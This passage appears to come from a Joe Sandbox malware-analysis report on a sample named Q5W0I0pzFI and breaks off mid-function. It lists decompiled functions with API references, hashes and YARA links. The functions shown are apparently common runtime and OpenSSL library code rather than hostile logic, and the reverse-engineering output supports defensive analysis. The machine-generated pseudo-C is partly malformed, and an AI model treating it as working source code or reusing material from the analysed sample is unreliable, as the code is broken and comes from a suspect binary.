Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00422130(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t124 = _t99;
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E0042B420(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(__eflags == 0) {
							goto L3;
						} else {
							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E0042B2F2(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E0042B420(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00425208(__eflags))) = 0x22;
												L4:
												E004242D2();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0042816B(_t119));
											_t88 = E0042B5C4();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00429544(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00425208(_t124))) = 0x16;
				goto L4;
			}

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043C677(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E0042019C( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00422BCC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00425208(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x0043c67f
0x0043c684
0x0043c69e
0x00000000
0x0043c69e
0x0043c686
0x0043c68b
0x00000000
0x00000000
0x0043c690
0x0043c6ad
0x0043c6b2
0x0043c6b5
0x0043c6bc
0x0043c6db
0x0043c6e2
0x0043c6e4
0x0043c728
0x0043c734
0x0043c737
0x0043c73c
0x0043c745
0x0043c747
0x0043c757
0x0043c757
0x0043c75b
0x0043c75d
0x0043c760
0x0043c760
0x0043c760
0x0043c760
0x00000000
0x0043c766
0x0043c749
0x0043c749
0x0043c74e
0x0043c74e
0x0043c751
0x00000000
0x0043c751
0x0043c6e6
0x0043c6e9
0x0043c6ed
0x0043c716
0x0043c716
0x0043c716
0x0043c719
0x0043c719
0x00000000
0x00000000
0x0043c71b
0x0043c71f
0x00000000
0x00000000
0x0043c721
0x0043c721
0x0043c721
0x00000000
0x0043c721
0x0043c6ef
0x0043c6ef
0x0043c6f2
0x00000000
0x00000000
0x0043c6f6
0x0043c700
0x0043c706
0x0043c709
0x0043c70f
0x0043c712
0x0043c714
0x00000000
0x00000000
0x00000000
0x0043c714
0x0043c6be
0x0043c6c1
0x0043c6c3
0x0043c6c8
0x0043c6c8
0x0043c6cd
0x00000000
0x0043c6cd
0x0043c692
0x0043c697
0x0043c69b
0x0043c69b
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C709
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C73F

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Uniqueness

Uniqueness Score: -1.00%

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004409B9(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00440F28(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00440A5D(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004411DC(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004410FD(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004127A0(WCHAR* __ecx, void* __edx) {
				int _v8;
				void* __ebx;
				void* __edi;
				short* _t12;
				void* _t17;
				char* _t18;
				int _t21;

				_t16 = __edx;
				_push(__ecx);
				_t12 = __ecx;
				_push(_t17);
				_t5 =  !=  ? 0xfde9 : 0;
				_v8 =  !=  ? 0xfde9 : 0;
				_t2 = lstrlenW(__ecx) + 1; // 0x1
				_t21 = _t2;
				_t18 = E00420C62(_t12, _t16, _t17, _t21);
				E0042B420(_t18, 0, _t21);
				WideCharToMultiByte(_v8, 0, _t12, 0xffffffff, _t18, _t21, 0, 0);
				return _t18;
			}

0x004127a0
0x004127a3
0x004127a7
0x004127b1
0x004127b2
0x004127b6
0x004127bf
0x004127bf
0x004127c9
0x004127ce
0x004127e4
0x004127f2

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00620000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Uniqueness

Uniqueness Score: -1.00%

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00414920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t128;
				intOrPtr _t134;
				intOrPtr* _t137;
				intOrPtr _t140;
				signed int _t144;
				intOrPtr* _t146;
				intOrPtr _t149;
				intOrPtr _t153;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr* _t165;
				intOrPtr _t167;
				intOrPtr _t171;
				intOrPtr _t191;
				signed int _t194;
				intOrPtr* _t195;
				intOrPtr _t196;
				intOrPtr* _t200;
				signed int _t203;
				intOrPtr _t204;
				intOrPtr* _t205;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				signed int _t212;
				intOrPtr* _t213;
				intOrPtr* _t217;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				signed int _t226;
				intOrPtr* _t231;
				void* _t232;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr* _t241;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				intOrPtr* _t251;
				void* _t258;
				void* _t259;

				_t200 = __ecx;
				_t259 = _t258 - 8;
				_t251 = __ecx;
				_t244 = _a4;
				_t128 =  *(__ecx + 0x10);
				if(_t128 < _t244) {
					L86:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *((intOrPtr*)(_t200 + 0x10));
				} else {
					_t226 = _a16;
					_t200 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t200 < _t226) {
						goto L86;
					} else {
						_v8 = _t128 - _t244;
						_t191 = _a8;
						_t192 =  <  ? _v8 : _t191;
						_v12 = _t200 - _t226;
						_a8 =  <  ? _v8 : _t191;
						_t200 =  <  ? _v12 : _a20;
						_t194 = _t128 - _a8;
						_v12 = _t194;
						_t195 = _a12;
						_a20 = _t200;
						if((_t128 | 0xffffffff) - _t200 <= _t194) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L86;
						} else {
							_t134 = _a8;
							_t246 = _v12 + _t200;
							_v8 = _v8 - _t134;
							_v12 = _t246;
							_t247 = _a4;
							if( *(__ecx + 0x10) < _t246) {
								E00415D50(_t195, __ecx, _t247, __ecx, _v12, 0);
								_t200 = _a20;
								_t226 = _a16;
								_t134 = _a8;
							}
							if(_t251 == _t195) {
								_t196 = _a20;
								__eflags = _t196 - _t134;
								if(_t196 > _t134) {
									__eflags = _t226 - _t247;
									if(_t226 > _t247) {
										_t203 = _t247 + _t134;
										_a4 = _t203;
										__eflags = _t203 - _t226;
										if(_t203 > _t226) {
											_t204 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_a12 = _t251;
											} else {
												_a12 =  *_t251;
												_t196 = _a20;
											}
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_t205 = _t251;
											} else {
												_t205 =  *_t251;
											}
											E0040B600(_t205 + _t247 * 2, _a12 + _t226 * 2, _t134);
											_t207 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t137 = _t251;
											} else {
												_t137 =  *_t251;
											}
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t208 = _t251;
											} else {
												_t208 =  *_t251;
											}
											_a20 = _a4 + _a4;
											E0040B600(_t208 + (_t247 + _t196) * 2, _a4 + _a4 + _t137, _v8);
											_t140 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t210 = _t251;
											} else {
												_t210 =  *_t251;
											}
											_push(_t196 - _a8);
											_t144 = _a16 + _t196;
											_t211 = _t210 + _a20;
											__eflags = _t210 + _a20;
										} else {
											_t149 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t235 = _t251;
											} else {
												_t235 =  *_t251;
											}
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t213 = _t251;
											} else {
												_t213 =  *_t251;
											}
											E0040B600(_t213 + (_t247 + _t196) * 2, _t235 + _a4 * 2, _v8);
											_t153 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 = _t251 + _t247 * 2;
											} else {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 =  *_t251 + _t247 * 2;
											}
										}
									} else {
										_t158 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t237 = _t251;
										} else {
											_t237 =  *_t251;
										}
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t217 = _t251;
										} else {
											_t217 =  *_t251;
										}
										E0040B600(_t217 + (_t247 + _t196) * 2, _t237 + (_a8 + _t247) * 2, _v8);
										_t163 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t231 = _t251;
										} else {
											_t231 =  *_t251;
										}
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t144 = _a16;
											_push(_t196);
											_t211 = _t251 + _t247 * 2;
										} else {
											_t144 = _a16;
											_push(_t196);
											_t211 =  *_t251 + _t247 * 2;
										}
									}
									_t232 = _t231 + _t144 * 2;
								} else {
									_t164 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t221 = _t251;
									} else {
										_t221 =  *_t251;
									}
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t165 = _t251;
									} else {
										_t165 =  *_t251;
									}
									E0040B600(_t165 + _t247 * 2, _t221 + _t226 * 2, _t196);
									_t167 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t240 = _t251;
									} else {
										_t240 =  *_t251;
									}
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t223 = _t251;
									} else {
										_t223 =  *_t251;
									}
									_push(_v8);
									_t232 = _t240 + (_a8 + _t247) * 2;
									_t211 = _t223 + (_t247 + _t196) * 2;
								}
								E0040B600(_t211, _t232);
							} else {
								_t171 =  *((intOrPtr*)(_t251 + 0x14));
								if(_t171 < 8) {
									_a4 = _t251;
								} else {
									_a4 =  *_t251;
								}
								if(_t171 < 8) {
									_t241 = _t251;
								} else {
									_t241 =  *_t251;
								}
								_t172 = _v8;
								if(_v8 != 0) {
									E004205A0(_t241 + (_t247 + _t200) * 2, _a4 + (_a8 + _t247) * 2, _t172 + _t172);
									_t195 = _a12;
									_t259 = _t259 + 0xc;
								}
								if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
									_t195 =  *_t195;
								}
								if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
									_t224 = _t251;
								} else {
									_t224 =  *_t251;
								}
								_t173 = _a20;
								if(_a20 != 0) {
									E0042D8D0(_t224 + _t247 * 2, _t195 + _a16 * 2, _t173 + _t173);
								}
							}
							_t212 = _v12;
							 *(_t251 + 0x10) = _t212;
							if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
								_t146 = _t251;
								__eflags = 0;
								 *((short*)(_t146 + _t212 * 2)) = 0;
								return _t146;
							} else {
								 *((short*)( *_t251 + _t212 * 2)) = 0;
								return _t251;
							}
						}
					}
				}
			}

APIs

_memmove.LIBCMT ref: 004149F1

Strings

string too long, xrefs: 00414C33
invalid string position, xrefs: 00414C3D

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1a8e88c41241774786442443c3d8b035ae5b88e252aa813e21978bd4265d7a9a
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 1a8e88c41241774786442443c3d8b035ae5b88e252aa813e21978bd4265d7a9a
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00470040(void* __edx) {
				signed int _t22;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				char* _t33;
				void* _t35;

				_t31 = __edx;
				_t33 =  *((intOrPtr*)(_t35 + 0x14));
				_t29 =  *((intOrPtr*)(_t33 + 0x10));
				if(_t29 == 0) {
					L2:
					_t30 = 0;
					 *((intOrPtr*)(_t35 + 0x18)) = 0;
				} else {
					_t30 =  *((intOrPtr*)(_t29 + 0x10));
					 *((intOrPtr*)(_t35 + 0x18)) = _t30;
					if(_t30 == 0) {
						goto L2;
					}
				}
				_t32 =  *((intOrPtr*)(_t35 + 0x14));
				if( *((intOrPtr*)(_t35 + 0x1c)) == 0) {
					 *_t32 = 0;
				}
				_t22 =  *_t33;
				if(_t22 > 6) {
					L12:
					return 1;
				} else {
					switch( *((intOrPtr*)(_t22 * 4 +  &M00470244))) {
						case 0:
							__eax =  *((intOrPtr*)(__esi + 8));
							__eflags = __eax;
							if(__eax == 0) {
								goto L18;
							} else {
								__eax = E0046FF00(__ebx, __edx, __edi, __ebp, __edi, __eax);
								goto L10;
							}
							goto L42;
						case 1:
							__eflags = __ebx;
							if(__ebx == 0) {
								L31:
								__eflags = __ebp;
								if(__ebp != 0) {
									L34:
									__ebx =  *((intOrPtr*)(__esi + 8));
									__ebp = 0;
									__eflags =  *((intOrPtr*)(__esi + 0xc));
									if( *((intOrPtr*)(__esi + 0xc)) <= 0) {
										L38:
										__eax =  *((intOrPtr*)(__esp + 0x18));
										__eflags = __eax;
										if(__eax == 0) {
											goto L12;
										} else {
											_push(0);
											_push(__esi);
											_push(__edi);
											_push(1);
											__eax =  *__eax();
											__esp = __esp + 0x10;
											__eflags = __eax;
											if(__eflags != 0) {
												goto L12;
											} else {
												goto L40;
											}
										}
									} else {
										while(1) {
											__eax = E00486D00(__edi, __ebx);
											__eflags = __eax;
											if(__eflags == 0) {
												goto L41;
											}
											__ebp = __ebp + 1;
											__ebx = __ebx + 0x14;
											__eflags = __ebp -  *((intOrPtr*)(__esi + 0xc));
											if(__ebp <  *((intOrPtr*)(__esi + 0xc))) {
												continue;
											} else {
												goto L38;
											}
											goto L42;
										}
										goto L41;
									}
								} else {
									__eax = E00454E50( *((intOrPtr*)(__esi + 0x14)), ".\\crypto\\asn1\\tasn_new.c", 0xbf);
									 *__edi = __eax;
									__eflags = __eax;
									if(__eflags == 0) {
										goto L41;
									} else {
										E00486AE0(__edi, __ebp, __esi) = E00486B80(__edi, __esi);
										goto L34;
									}
								}
							} else {
								_push(0);
								_push(__esi);
								_push(__edi);
								_push(0);
								__eax =  *__ebx();
								__esp = __esp + 0x10;
								__eflags = __eax;
								if(__eflags == 0) {
									goto L40;
								} else {
									__eflags = __eax - 2;
									if(__eax == 2) {
										goto L12;
									} else {
										goto L31;
									}
								}
							}
							goto L42;
						case 2:
							__eflags = __ebx;
							if(__ebx == 0) {
								L22:
								__eflags = __ebp;
								if(__ebp != 0) {
									L25:
									__eax = E00486D20(__edi, 0xffffffff, __esi);
									__eflags = __ebx;
									if(__ebx == 0) {
										goto L12;
									} else {
										_push(0);
										_push(__esi);
										_push(__edi);
										_push(1);
										__eax =  *__ebx();
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eflags == 0) {
											goto L40;
										} else {
											__eax = 1;
											return 1;
										}
									}
								} else {
